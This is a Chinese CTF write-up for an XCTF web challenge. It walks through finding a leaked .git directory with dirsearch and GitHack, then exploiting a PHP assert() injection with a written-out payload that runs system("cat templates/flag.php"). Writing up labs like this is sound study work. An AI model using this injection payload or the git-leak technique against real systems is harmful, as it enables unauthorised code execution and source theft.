题目
![[外链图片转存失败(img-VOARca9a-1562659889643)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.ti.PNG)]](https://img-blog.csdnimg.cn/20190709175222246.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
writeup
查看页面源代码
发现:
?page=flag
![[外链图片转存失败(img-bWCKK4id-1562659889645)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.1.PNG)]](https://img-blog.csdnimg.cn/20190709175241984.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
于是尝试一下
发现可访问,但是没东西
![[外链图片转存失败(img-Ik1u04v8-1562659889645)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.2.PNG)]](https://img-blog.csdnimg.cn/20190709180400268.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
于是尝试看看其他地方
发现About页面
![[外链图片转存失败(img-W3u3es6o-1562659889646)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.3.PNG)]](https://img-blog.csdnimg.cn/20190709180410316.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
看到了Git
怀疑是git泄露
于是利用dirsearch扫一下
![[外链图片转存失败(img-s9tMfKax-1562659889647)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.4.PNG)]](https://img-blog.csdnimg.cn/20190709180421693.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
发现了/.git/
访问
![[外链图片转存失败(img-MGu5US8D-1562659889648)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.5.PNG)]](https://img-blog.csdnimg.cn/20190709180430707.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
利用GitHack下载源码
![[外链图片转存失败(img-IYAZa4iw-1562659889649)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.6.PNG)]](https://img-blog.csdnimg.cn/20190709180438969.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
得到一个以url命名的文件夹
打开发现了flag.php
但是啥都没有
![[外链图片转存失败(img-qWvJUOr8-1562659889650)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.7.PNG)]](https://img-blog.csdnimg.cn/20190709180447544.PNG)
再看index.php
![[外链图片转存失败(img-mzccCxJw-1562659889650)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.8.PNG)]](https://img-blog.csdnimg.cn/20190709180457321.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
即
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
分析代码可知,
若想得到flag,即得到"Detected hacking attempt!"
则需要给page传入的须满足
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false")
尝试
?page=abc') or system("cat templates/flag.php");//
即
$file = "templates/?page=abc') or system("cat templates/flag.php");//.php";
即
assert("strpos('templates/?page=abc') or system("cat templates/flag.php");//.php', '..') === false") or die("Detected hacking attempt!");
得到
![[外链图片转存失败(img-xHyzrQxr-1562659889650)(E:\CTF\小白学习总结\攻防世界\web\picture2\3.flag.PNG)]](https://img-blog.csdnimg.cn/20190709180513650.PNG)
知识点
1、dirsearch-master
相当好用的轻量扫描
https://www.freebuf.com/column/153277.html
常用
python3 dirsearch.py -u url -e php
2、GitHack
一个git泄露利用脚本,很好用~
https://www.freebuf.com/sectool/66096.html
常用
python27 GitHack.py url/.git/
3、strpos()
![[外链图片转存失败(img-9qQprGzF-1562659889651)(E:\CTF\小白学习总结\攻防世界\web\picture2\k3.1.PNG)]](https://img-blog.csdnimg.cn/20190709180525958.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d5al8xMjE2,size_16,color_FFFFFF,t_70)
<?php
echo strpos("You love php, I love php too!","php");
?>
运行结果:9
4、assert()
https://www.cnblogs.com/yuerdongni/archive/2013/10/12/3364954.html
用来判断一个表达式是否成立。返回true or false
